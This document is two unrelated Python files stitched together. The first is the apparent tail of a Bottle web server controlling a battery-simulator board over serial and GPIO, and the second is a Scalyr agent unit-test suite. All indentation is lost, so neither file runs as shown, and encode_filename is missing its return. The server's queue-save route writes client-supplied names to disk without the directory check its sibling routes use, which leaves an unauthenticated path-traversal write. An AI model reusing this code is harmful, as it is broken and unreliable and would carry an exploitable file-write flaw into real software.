@route('/hello')
def hello_handler():
return "Hello World!!"
@route('/css/:path#.+#')
def static_css_handler(path):
return static_file(path, root=os.path.join(resources_dir(), 'frontend/css'))
@route('/js/:path#.+#')
def static_js_handler(path):
return static_file(path, root=os.path.join(resources_dir(), 'frontend/js'))
@route('/img/:path#.+#')
def static_img_handler(path):
return static_file(path, root=os.path.join(resources_dir(), 'frontend/img'))
@route('/favicon.ico')
def favicon_handler():
return static_file('favicon.ico', root=os.path.join(resources_dir(), 'frontend/img'))
### LIBRARY
@route('/library/get/:path#.+#')
def static_library_handler(path):
return static_file(path, root=os.path.join(resources_dir(), 'library'), mimetype='text/plain')
@route('/library/list')
def library_list_handler():
# return a json list of file names
file_list = []
cwd_temp = os.getcwd()
try:
os.chdir(os.path.join(resources_dir(), 'library'))
file_list = glob.glob('*')
finally:
os.chdir(cwd_temp)
return json.dumps(file_list)
### QUEUE
def encode_filename(name):
str(time.time()) + '-' + base64.urlsafe_b64encode(name)
def decode_filename(name):
index = name.find('-')
return base64.urlsafe_b64decode(name[index+1:])
@route('/queue/get/:name#.+#')
def static_queue_handler(name):
return static_file(name, root=storage_dir(), mimetype='text/plain')
@route('/queue/list')
def library_list_handler():
# base64.urlsafe_b64encode()
# base64.urlsafe_b64decode()
# return a json list of file names
files = []
cwd_temp = os.getcwd()
try:
os.chdir(storage_dir())
files = filter(os.path.isfile, glob.glob("*"))
files.sort(key=lambda x: os.path.getmtime(x))
finally:
os.chdir(cwd_temp)
return json.dumps(files)
@route('/queue/save', method='POST')
def queue_save_handler():
ret = '0'
if 'command_list_name' in request.forms and 'command_program' in request.forms:
name = request.forms.get('command_list_name')
command_program = request.forms.get('command_program')
filename = os.path.abspath(os.path.join(storage_dir(), name.strip('/\\')))
if os.path.exists(filename) or os.path.exists(filename+'.starred'):
return "file_exists"
try:
fp = open(filename, 'w')
fp.write(command_program)
print "file saved: " + filename
ret = '1'
finally:
fp.close()
else:
print "error: save failed, invalid POST request"
return ret
@route('/queue/rm/:name')
def queue_rm_handler(name):
# delete gcode item, on success return '1'
ret = '0'
filename = os.path.abspath(os.path.join(storage_dir(), name.strip('/\\')))
if filename.startswith(storage_dir()):
if os.path.exists(filename):
try:
os.remove(filename);
print "file deleted: " + filename
ret = '1'
finally:
pass
return ret
@route('/queue/star/:name')
def queue_star_handler(name):
ret = '0'
filename = os.path.abspath(os.path.join(storage_dir(), name.strip('/\\')))
if filename.startswith(storage_dir()):
if os.path.exists(filename):
os.rename(filename, filename + '.starred')
ret = '1'
return ret
@route('/queue/unstar/:name')
def queue_unstar_handler(name):
ret = '0'
filename = os.path.abspath(os.path.join(storage_dir(), name.strip('/\\')))
if filename.startswith(storage_dir()):
if os.path.exists(filename + '.starred'):
os.rename(filename + '.starred', filename)
ret = '1'
return ret
@route('/')
@route('/index.html')
@route('/app.html')
def default_handler():
return static_file('app.html', root=os.path.join(resources_dir(), 'frontend') )
@route('/canvas')
def canvas_handler():
return static_file('testCanvas.html', root=os.path.join(resources_dir(), 'frontend'))
@route('/serial/:connect')
def serial_handler(connect):
if connect == '1':
# print 'js is asking to connect serial'
if not SerialManager.is_connected():
try:
global SERIAL_PORT, BITSPERSECOND, GUESS_PREFIX
if not SERIAL_PORT:
SERIAL_PORT = SerialManager.match_device(GUESS_PREFIX, BITSPERSECOND)
SerialManager.connect(SERIAL_PORT, BITSPERSECOND)
ret = "Serial connected to %s:%d." % (SERIAL_PORT, BITSPERSECOND) + '<br>'
time.sleep(1.0) # allow some time to receive a prompt/welcome
SerialManager.flush_input()
SerialManager.flush_output()
return ret
except serial.SerialException:
SERIAL_PORT = None
print "Failed to connect to serial."
return ""
elif connect == '0':
# print 'js is asking to close serial'
if SerialManager.is_connected():
if SerialManager.close(): return "1"
else: return ""
elif connect == "2":
# print 'js is asking if serial connected'
if SerialManager.is_connected(): return "1"
else: return ""
else:
print 'ambigious connect request from js: ' + connect
return ""
@route('/status')
def get_status():
status = copy.deepcopy(tm.status)
status['serial_connected'] = SerialManager.is_connected()
return json.dumps(status)
@route('/pause/:flag')
def set_pause(flag):
global quitFlag
if flag == '1':
quitFlag = False
waitEvent.clear()
elif flag == '0':
quitFlag = False
waitEvent.set()
return flag
@route('/reset')
def reset_handler():
return '1'
@route('/stop')
def reset_handler():
global quitFlag
quitFlag = True
#waitEvent.set()
return 'Stop flag setted!'
@route('/gcode', method='POST')
def gcode_submit_handler():
global pct,quitFlag
command_program = request.forms.get('command_program')
if command_program:
try:
f = open('currentCommandList.py','w')
f.write(command_program)
pct = 0
quitFlag = False
waitEvent.set() #start command processor
return "__ok__"
except:
return "write error!"
else:
return "disconnected"
@route('/queue_pct_done')
def queue_pct_done_handler():
global pct,quitFlag
if quitFlag:
return None
return str(pct)
@route('/graph_data_length_max')
def graph_data_length_max_handler():
return str(graphDataLengthMax)
@route('/svg_reader', method='POST')
def svg_upload():
"""Parse SVG string."""
filename = request.forms.get('filename')
filedata = request.forms.get('filedata')
if filename and filedata:
print "You uploaded %s (%d bytes)." % (filename, len(filedata))
#if filename[-4:] in ['.dxf', '.DXF']:
# res = read_dxf(filedata, TOLERANCE, optimize)
#else:
# res = read_svg(filedata, [1220,610], TOLERANCE, dpi_forced, optimize)
# print boundarys
jsondata = json.dumps({})
# print "returning %d items as %d bytes." % (len(res['boundarys']), len(jsondata))
return jsondata
return "You missed a field."
### Setup Argument Parser
argparser = argparse.ArgumentParser(description='Run TS_BatterySimulator.', prog='TS_BatterySimulator')
argparser.add_argument('port', metavar='serial_port', nargs='?', default=False,
help='serial port to the Simulator')
argparser.add_argument('-v', '--version', action='version', version='%(prog)s ' + VERSION)
argparser.add_argument('-p', '--public', dest='host_on_all_interfaces', action='store_true',
default=False, help='bind to all network devices (default: bind to 127.0.0.1)')
argparser.add_argument('-l', '--list', dest='list_serial_devices', action='store_true',
default=False, help='list all serial devices currently connected')
argparser.add_argument('-d', '--debug', dest='debug', action='store_true',
default=False, help='print more verbose for debugging')
argparser.add_argument('--beaglebone', dest='beaglebone', action='store_true',
default=False, help='use this for running on beaglebone')
argparser.add_argument('--raspberrypi', dest='raspberrypi', action='store_true',
default=False, help='use this for running on Raspberry Pi')
argparser.add_argument('-m', '--match', dest='match',
default=GUESS_PREFIX, help='match serial device with this string')
args = argparser.parse_args()
print "TS_BatterySimulator " + VERSION
if args.beaglebone:
HARDWARE = 'beaglebone'
NETWORK_PORT = 80
### if running on beaglebone, setup (pin muxing) and use UART1
# for details see: http://www.nathandumont.com/node/250
SERIAL_PORT = "/dev/ttyO1"
# echo 0 > /sys/kernel/debug/omap_mux/uart1_txd
fw = file("/sys/kernel/debug/omap_mux/uart1_txd", "w")
fw.write("%X" % (0))
fw.close()
# echo 20 > /sys/kernel/debug/omap_mux/uart1_rxd
fw = file("/sys/kernel/debug/omap_mux/uart1_rxd", "w")
fw.write("%X" % ((1 << 5) | 0))
fw.close()
### Set up atmega328 reset control
# The reset pin is connected to GPIO2_7 (2*32+7 = 71).
# Setting it to low triggers a reset.
# echo 71 > /sys/class/gpio/export
try:
fw = file("/sys/class/gpio/export", "w")
fw.write("%d" % (71))
fw.close()
except IOError:
# probably already exported
pass
# set the gpio pin to output
# echo out > /sys/class/gpio/gpio71/direction
fw = file("/sys/class/gpio/gpio71/direction", "w")
fw.write("out")
fw.close()
# set the gpio pin high
# echo 1 > /sys/class/gpio/gpio71/value
fw = file("/sys/class/gpio/gpio71/value", "w")
fw.write("1")
fw.flush()
fw.close()
### read stepper driver configure pin GPIO2_12 (2*32+12 = 76).
# Low means Geckos, high means SMC11s
try:
fw = file("/sys/class/gpio/export", "w")
fw.write("%d" % (76))
fw.close()
except IOError:
# probably already exported
pass
# set the gpio pin to input
fw = file("/sys/class/gpio/gpio76/direction", "w")
fw.write("in")
fw.close()
# set the gpio pin high
fw = file("/sys/class/gpio/gpio76/value", "r")
ret = fw.read()
fw.close()
print "Stepper driver configure pin is: " + str(ret)
elif args.raspberrypi:
HARDWARE = 'raspberrypi'
NETWORK_PORT = 80
SERIAL_PORT = "/dev/ttyAMA0"
import RPi.GPIO as GPIO
# GPIO.setwarnings(False) # surpress warnings
GPIO.setmode(GPIO.BCM) # use chip pin number
pinSense = 7
pinReset = 2
pinExt1 = 3
pinExt2 = 4
pinExt3 = 17
pinTX = 14
pinRX = 15
# read sens pin
GPIO.setup(pinSense, GPIO.IN)
isSMC11 = GPIO.input(pinSense)
# atmega reset pin
GPIO.setup(pinReset, GPIO.OUT)
GPIO.output(pinReset, GPIO.HIGH)
# no need to setup the serial pins
# although /boot/cmdline.txt and /etc/inittab needs
# to be edited to deactivate the serial terminal login
# (basically anything related to ttyAMA0)
if args.list_serial_devices:
SerialManager.list_devices(BITSPERSECOND)
else:
if not SERIAL_PORT:
if args.port:
# (1) get the serial device from the argument list
SERIAL_PORT = args.port
print "Using serial device '"+ SERIAL_PORT +"' from command line."
else:
# (2) get the serial device from the config file
if os.path.isfile(CONFIG_FILE):
fp = open(CONFIG_FILE)
line = fp.readline().strip()
if len(line) > 3:
SERIAL_PORT = line
print "Using serial device '"+ SERIAL_PORT +"' from '" + CONFIG_FILE + "'."
if not SERIAL_PORT:
if args.match:
GUESS_PREFIX = args.match
SERIAL_PORT = SerialManager.match_device(GUESS_PREFIX, BITSPERSECOND)
if SERIAL_PORT:
print "Using serial device '"+ str(SERIAL_PORT)
if os.name == 'posix':
# not for windows for now
print "(first device to match: " + args.match + ")"
else:
SERIAL_PORT = SerialManager.match_device(GUESS_PREFIX, BITSPERSECOND)
if SERIAL_PORT:
print "Using serial device '"+ str(SERIAL_PORT) +"' by best guess."
if not SERIAL_PORT:
print "-----------------------------------------------------------------------------"
print "WARNING: TS_BatterySimulator doesn't know what serial device to connect to!"
print "Make sure the TS_BatterySimulator hardware is connectd to the USB interface."
if os.name == 'nt':
print "ON WINDOWS: You will also need to setup the virtual com port."
print "See 'Installing Drivers': http://arduino.cc/en/Guide/Windows"
print "-----------------------------------------------------------------------------"
#start command processor
commandProcessorThread = threading.Thread(name='commandProcessor',
target=CommandProcessor,
args=(waitEvent,))
commandProcessorThread.start()
#start serial processor
serialProcessorThread = threading.Thread(name='serialProcessor',
target=serialProcessor)
serialProcessorThread.start()
# run
if args.debug:
debug(True)
if hasattr(sys, "_MEIPASS"):
print "Data root is: " + sys._MEIPASS
else:
if args.host_on_all_interfaces:
run_with_callback('', NETWORK_PORT)
else:
run_with_callback('127.0.0.1', NETWORK_PORT)
|
util_test.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: Steven Czerwinski <czerwin@scalyr.com>
__author__ = 'czerwin@scalyr.com'
import datetime
import os
import tempfile
import struct
import threading
from mock import patch, MagicMock
import scalyr_agent.util as scalyr_util
from scalyr_agent.util import JsonReadFileException, RateLimiter, FakeRunState, ScriptEscalator, HistogramTracker
from scalyr_agent.util import StoppableThread, RedirectorServer, RedirectorClient, RedirectorError
from scalyr_agent.util import verify_and_get_compress_func
from scalyr_agent.json_lib import JsonObject
from scalyr_agent.test_base import ScalyrTestCase
class TestUtilCompression(ScalyrTestCase):
def setUp(self):
super(TestUtilCompression, self).setUp()
self._data = 'The rain in spain. ' * 1000
def test_zlib(self):
"""Successful zlib compression"""
data = self._data
compress = verify_and_get_compress_func('deflate')
import zlib
self.assertEqual(data, zlib.decompress(compress(data)))
def test_bz2(self):
"""Successful bz2 compression"""
data = self._data
compress = verify_and_get_compress_func('bz2')
import bz2
self.assertEqual(data, bz2.decompress(compress(data)))
def test_bad_compression_type(self):
"""User enters unsupported compression type"""
self.assertIsNone(verify_and_get_compress_func('bad_compression_type'))
def test_bad_compression_lib_exception_on_import(self):
"""Pretend that import bz2/zlib raises exception"""
def _mock_get_compress_module(compression_type):
raise Exception('Mimic exception when importing compression lib')
@patch('scalyr_agent.util.get_compress_module', new=_mock_get_compress_module)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test('deflate')
_test('bz2')
def test_bad_compression_lib_no_compression(self):
"""Pretend that the zlib/bz2 library compress() method doesn't perform any comnpression"""
def _mock_get_compress_module(compression_type):
m = MagicMock()
# simulate module.compress() method that does not compress input data string
m.compress = lambda data, compression_level: data
return m
@patch('scalyr_agent.util.get_compress_module', new=_mock_get_compress_module)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test('deflate')
_test('bz2')
class TestUtil(ScalyrTestCase):
def setUp(self):
super(TestUtil, self).setUp()
self.__tempdir = tempfile.mkdtemp()
self.__path = os.path.join(self.__tempdir, 'testing.json')
def test_read_file_as_json(self):
self.__create_file(self.__path, '{ a: "hi"}')
json_object = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(json_object, JsonObject(a='hi'))
def test_read_file_as_json_no_file(self):
self.assertRaises(JsonReadFileException, scalyr_util.read_file_as_json, 'foo')
def test_read_file_as_json_with_bad_json(self):
self.__create_file(self.__path, '{ a: hi}')
self.assertRaises(JsonReadFileException, scalyr_util.read_file_as_json, self.__path)
def test_atomic_write_dict_as_json_file(self):
info = { 'a': "hi" }
scalyr_util.atomic_write_dict_as_json_file( self.__path, self.__path + '~', info )
json_object = scalyr_util.read_file_as_json( self.__path )
self.assertEquals( json_object, JsonObject( a='hi' ) )
def __create_file(self, path, contents):
fp = open(path, 'w')
fp.write(contents)
fp.close()
def test_seconds_since_epoch( self ):
dt = datetime.datetime( 2015, 8, 6, 14, 40, 56 )
expected = 1438872056.0
actual = scalyr_util.seconds_since_epoch( dt )
self.assertEquals( expected, actual )
def test_microseconds_since_epoch( self ):
dt = datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 )
expected = 1438872056123456
actual = scalyr_util.microseconds_since_epoch( dt )
self.assertEquals( expected, actual )
def test_rfc3339_to_datetime( self ):
s = "2015-08-06T14:40:56.123456Z"
expected = datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 )
actual = scalyr_util.rfc3339_to_datetime( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_datetime_truncated_nano( self ):
s = "2015-08-06T14:40:56.123456789Z"
expected = datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 )
actual = scalyr_util.rfc3339_to_datetime( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_datetime_bad_format_date_and_time_separator( self ):
s = "2015-08-06 14:40:56.123456789Z"
expected = None
actual = scalyr_util.rfc3339_to_datetime( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_datetime_bad_format_has_timezone( self ):
# currently this function only handles UTC. Remove this test if
# updated to be more flexible
s = "2015-08-06T14:40:56.123456789+04:00"
expected = None
actual = scalyr_util.rfc3339_to_datetime( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch( self ):
s = "2015-08-06T14:40:56.123456Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 ) ) * 1000
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_no_fractions( self ):
s = "2015-08-06T14:40:56"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56) ) * 1000
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_some_fractions( self ):
s = "2015-08-06T14:40:56.123Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56, 123000 ) ) * 1000
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_many_fractions( self ):
s = "2015-08-06T14:40:56.123456789Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 ) ) * 1000 + 789
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_too_many_fractions( self ):
s = "2015-08-06T14:40:56.123456789999Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 ) ) * 1000 + 789
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_strange_value( self ):
s = "2017-09-20T20:44:00.123456Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2017, 9, 20, 20, 44, 00, 123456 ) ) * 1000
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_uuid(self):
first = scalyr_util.create_unique_id()
second = scalyr_util.create_unique_id()
self.assertTrue(len(first) > 0)
self.assertTrue(len(second) > 0)
self.assertNotEqual(first, second)
def test_remove_newlines_and_truncate(self):
self.assertEquals(scalyr_util.remove_newlines_and_truncate('hi', 1000), 'hi')
self.assertEquals(scalyr_util.remove_newlines_and_truncate('ok then', 2), 'ok')
self.assertEquals(scalyr_util.remove_newlines_and_truncate('o\nk\n', 1000), 'o k ')
self.assertEquals(scalyr_util.remove_newlines_and_truncate('ok\n\r there', 1000), 'ok there')
self.assertEquals(scalyr_util.remove_newlines_and_truncate('ok\n\r there', 6), 'ok t')
def test_is_list_of_strings_yes( self ):
self.assertTrue( scalyr_util.is_list_of_strings( [ '*', 'blah', 'dah' ] ) )
def test_is_list_of_strings_no( self ):
self.assertFalse( scalyr_util.is_list_of_strings( [ '*', 3, { 'blah': 'dah' } ] ) )
def test_is_list_of_strings_none( self ):
self.assertFalse( scalyr_util.is_list_of_strings( None ) )
class TestRateLimiter(ScalyrTestCase):
def setUp(self):
super(TestRateLimiter, self).setUp()
self.__test_rate = RateLimiter(100, 10, current_time=0)
self.__current_time = 0
def advance_time(self, delta):
self.__current_time += delta
def charge_if_available(self, num_bytes):
return self.__test_rate.charge_if_available(num_bytes, current_time=self.__current_time)
def test_basic_use(self):
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
def test_refill(self):
self.assertTrue(self.charge_if_available(60))
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertTrue(self.charge_if_available(60))
class TestRunState(ScalyrTestCase):
def test_basic_use(self):
# We use a FakeRunState for testing just so we do not accidentally sleep.
run_state = FakeRunState()
self.assertTrue(run_state.is_running())
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 1)
run_state.stop()
self.assertFalse(run_state.is_running())
def test_sleeping_already_stopped(self):
run_state = FakeRunState()
run_state.stop()
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 0)
def test_callbacks(self):
self.called = False
def on_stop():
self.called = True
run_state = FakeRunState()
run_state.register_on_stop_callback(on_stop)
run_state.stop()
self.assertTrue(self.called)
# Make sure it is immediately invoked if already stopped.
self.called = False
run_state.register_on_stop_callback(on_stop)
self.assertTrue(self.called)
class TestStoppableThread(ScalyrTestCase):
def setUp(self):
super(TestStoppableThread, self).setUp()
self._run_counter = 0
def test_basic_use(self):
# Since the ScalyrTestCase sets the name prefix, we need to set it back to None to get an unmolested name.
StoppableThread.set_name_prefix(None)
test_thread = StoppableThread('Testing', self._run_method)
self.assertEqual(test_thread.getName(), 'Testing')
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix(self):
StoppableThread.set_name_prefix('test_name_prefix: ')
test_thread = StoppableThread('Testing', self._run_method)
self.assertEqual(test_thread.getName(), 'test_name_prefix: Testing')
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix_with_none(self):
StoppableThread.set_name_prefix('test_name_prefix: ')
test_thread = StoppableThread(target=self._run_method)
self.assertEqual(test_thread.getName(), 'test_name_prefix: ')
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_basic_extending(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, 'Test thread')
def run_and_propagate(self):
self.run_counter += 1
while self._run_state.is_running():
self.run_counter += 1
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread = TestThread()
test_thread.start()
test_thread.stop()
self.assertTrue(test_thread.run_counter > 0)
def test_exception(self):
class TestException(Exception):
pass
def throw_an_exception(run_state):
run_state.is_running()
raise TestException()
test_thread = StoppableThread('Testing', throw_an_exception)
test_thread.start()
caught_it = False
try:
test_thread.stop()
except TestException:
caught_it = True
self.assertTrue(caught_it)
def _run_method(self, run_state):
self._run_counter += 1
while run_state.is_running():
self._run_counter += 1
run_state.sleep_but_awaken_if_stopped(0.03)
class TestScriptEscalator(ScalyrTestCase):
def test_is_user_change_required(self):
(test_instance, controller) = self.create_instance('czerwin', 'fileA', 'steve')
self.assertTrue(test_instance.is_user_change_required())
(test_instance, controller) = self.create_instance('czerwin', 'fileA', 'czerwin')
self.assertFalse(test_instance.is_user_change_required())
def test_change_user_and_rerun_script(self):
(test_instance, controller) = self.create_instance('czerwin', 'fileA', 'steve')
self.assertEquals(test_instance.change_user_and_rerun_script('random'), 0)
self.assertEquals(controller.call_count, 1)
self.assertEquals(controller.last_call['user'], 'steve')
self.assertIsNotNone(controller.last_call['script_file'])
def create_instance(self, current_user, config_file, config_owner):
controller = TestScriptEscalator.ControllerMock(current_user, config_file, config_owner)
# noinspection PyTypeChecker
return ScriptEscalator(controller, config_file, os.getcwd() ), controller
class ControllerMock(object):
def __init__(self, running_user, expected_config_file, config_owner):
self.__running_user = running_user
self.__expected_config_file = expected_config_file
self.__config_owner = config_owner
self.last_call = None
self.call_count = 0
def get_current_user(self):
return self.__running_user
def get_file_owner(self, config_file_path):
assert self.__expected_config_file == config_file_path
if self.__expected_config_file == config_file_path:
return self.__config_owner
else:
return None
def run_as_user(self, user, script_file_path, script_binary, script_args):
self.call_count += 1
self.last_call = {
'user': user,
'script_file': script_file_path,
'script_binary': script_binary,
'script_args': script_args
}
return 0
class TestRedirectorServer(ScalyrTestCase):
"""Tests the RedirectorServer code using fakes for stdout, stderr and the channel.
"""
def setUp(self):
super(TestRedirectorServer, self).setUp()
# Allows us to watch what bytes are being sent to the client.
self._channel = FakeServerChannel()
# Allows us to write bytes to stdout, stderr without them going to the terminal.
self._sys = FakeSys()
self._server = RedirectorServer(self._channel, sys_impl=self._sys)
def test_sending_str(self):
self._server.start()
# Verify that the server told the channel to accept the next client connection.
self.assertEquals(self._channel.accept_count, 1)
# Simulate writing to stdout.
self._sys.stdout.write('Testing')
# Make sure we wrote a message to the channel
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, 'Testing')
def test_sending_unicode(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stdout.write(u'caf\xe9')
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, u'caf\xe9')
def test_sending_to_stderr(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stderr.write('Testing again')
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 1)
self.assertEquals(content, 'Testing again')
def test_connection_failure(self):
# Set the channel to simulate a connection timeout.
self._channel.timeout_connection = True
caught_it = False
try:
# Make sure that we get an exception.
self._server.start()
except RedirectorError:
caught_it = True
self.assertTrue(caught_it)
def _parse_sent_bytes(self, content):
"""Parses the stream id and the actual content from the encoded content string sent by the server.
@param content: The string sent by the server.
@type content: str
@return: A tuple of the stream_id and the actual content encoded in the sent string.
@rtype: (int,str)
"""
prefix_code = content[0:4]
code = struct.unpack('i', prefix_code)[0]
stream_id = code % 2
num_bytes = code >> 1
self.assertEquals(len(content), num_bytes + 4)
decoded_str = content[4:].decode('utf-8')
return stream_id, decoded_str
class TestRedirectorClient(ScalyrTestCase):
"""Test the RedirectorClient by faking out the client channel and also the clock.
"""
def setUp(self):
super(TestRedirectorClient, self).setUp()
self._fake_sys = FakeSys()
# Since the client is an actual other thread that blocks waiting for input from the server, we have to
# simulate the time using a fake clock. That will allow us to wait up the client thread from time to time.
self._fake_clock = scalyr_util.FakeClock()
# The fake channel allows us to insert bytes being sent by the server.
self._client_channel = FakeClientChannel(self._fake_clock)
self._client = RedirectorClient(self._client_channel, sys_impl=self._fake_sys, fake_clock=self._fake_clock)
self._client.start()
# Wait until the client thread begins to block for the initial accept from the server.
self._fake_clock.block_until_n_waiting_threads(1)
def tearDown(self):
if self._client is not None:
self._client.stop(wait_on_join=False)
self._fake_clock.advance_time(set_to=59.0)
self._client.join()
def test_receiving_str(self):
# Simulate accepting the connection.
self._accept_client_connection()
self._send_to_client(0, 'Testing')
# Wait until have bytes written to stdout by the client thread.
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, 'Testing')
def test_receiving_unicode(self):
self._accept_client_connection()
self._send_to_client(0, u'caf\xe9')
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, u'caf\xe9')
def test_connection_timeout(self):
# We advance the time past 60 seconds which is the connection time out.
self._fake_clock.advance_time(set_to=61.0)
got_it = False
try:
# Even though we have not called stop on the thread or the server hasn't closed the connection,
# we should still see the client thread terminate because of the exception it raises.
self._client.join()
except RedirectorError:
got_it = True
self._client = None
self.assertTrue(got_it)
def test_close_from_server(self):
self._accept_client_connection()
self._send_to_client(-1, '')
# Even though we haven't called stop on the client thread, it should still end because the server sent
# the signal to stop/close.
self._client.join()
self._client = None
def test_stopped_during_connection(self):
self._client.stop(wait_on_join=False)
# We have wake all threads so the client thread will notice its thread has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def test_stopped_during_reading(self):
self._accept_client_connection()
self._client.stop(wait_on_join=False)
# We have wake all threads so the client thread will notice its thread has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def _accept_client_connection(self):
self._client_channel.simulate_server_connect()
def _send_to_client(self, stream_id, content):
encoded_content = unicode(content).encode('utf-8')
code = len(encoded_content) * 2 + stream_id
self._client_channel.simulate_server_write(struct.pack('i', code) + encoded_content)
class TestRedirectionService(ScalyrTestCase):
"""Tests both the RedirectorServer and the RedirectorClient communicating together.
"""
def setUp(self):
super(TestRedirectionService, self).setUp()
self._client_sys = FakeSys()
self._server_sys = FakeSys()
self._fake_clock = scalyr_util.FakeClock()
self._client_channel = FakeClientChannel(self._fake_clock)
self._server_channel = FakeServerChannel(self._client_channel)
self._client = RedirectorClient(self._client_channel, sys_impl=self._client_sys, fake_clock=self._fake_clock)
self._server = RedirectorServer(self._server_channel, sys_impl=self._server_sys)
self._client.start()
self._server.start()
def test_end_to_end(self):
self._server_sys.stdout.write('Test full')
self._server.stop()
self._client.stop()
class FakeServerChannel(RedirectorServer.ServerChannel):
"""A mock-like object for the ServerChannel that allows us to see if certain methods were invoked and with
what arguments.
"""
def __init__(self, client_channel=None):
# Gives the counts of the various methods.
self.close_count = 0
self.accept_count = 0
self.write_count = 0
# The last string that was used when invoking `write`.
self.last_write = None
# If set to True, when the server invokes `accept_client`, it will simulate a connection timeout.
self.timeout_connection = False
# If not None, the fake client channel to send the bytes from `write`.
self._client_channel = client_channel
def accept_client(self, timeout=None):
self.accept_count += 1
if not self.timeout_connection and self._client_channel is not None:
self._client_channel.simulate_server_connect()
return not self.timeout_connection
def write(self, content):
self.write_count += 1
self.last_write = content
if self._client_channel is not None:
self._client_channel.simulate_server_write(content)
def close(self):
self.close_count += 1
class FakeClientChannel(object):
"""Fakes out the RedirectorClient.ClientChannel interface.
This allows us to simulate the connection being accepted by the server and bytes being sent by the server.
"""
def __init__(self, fake_clock):
self._lock = threading.Lock()
self._allow_connection = False
self._pending_content = ''
self._fake_clock = fake_clock
def connect(self):
self._lock.acquire()
result = self._allow_connection
self._lock.release()
return result
def peek(self):
self._lock.acquire()
if self._pending_content is not None:
bytes_to_read = len(self._pending_content)
else:
bytes_to_read = 0
self._lock.release()
return bytes_to_read, 0
def read(self, num_bytes_to_read):
self._lock.acquire()
assert num_bytes_to_read <= len(self._pending_content)
result = self._pending_content[0:num_bytes_to_read]
self._pending_content = self._pending_content[num_bytes_to_read:]
self._lock.release()
return result
def close(self):
pass
def simulate_server_connect(self):
self._lock.acquire()
self._allow_connection = True
self._lock.release()
self._simulate_busy_loop_advance()
def simulate_server_write(self, content):
self._lock.acquire()
self._pending_content = '%s%s' % (self._pending_content, content)
self._lock.release()
self._simulate_busy_loop_advance()
def _simulate_busy_loop_advance(self):
self._fake_clock.advance_time(increment_by=0.4)
class FakeSys(object):
def __init__(self):
self.stdout = FakeSys.FakeFile()
self.stderr = FakeSys.FakeFile()
class FakeFile(object):
def __init__(self):
self._condition = threading.Condition()
self._last_write = None
def write(self, content):
self._condition.acquire()
self._last_write = content
self._condition.notifyAll()
self._condition.release()
@property
def last_write(self):
self._condition.acquire()
result = self._last_write
self._condition.release()
return result
def wait_for_bytes(self, timeout):
self._condition.acquire()
try:
if self._last_write is not None:
return
self._condition.wait(timeout)
finally:
self._condition.release()
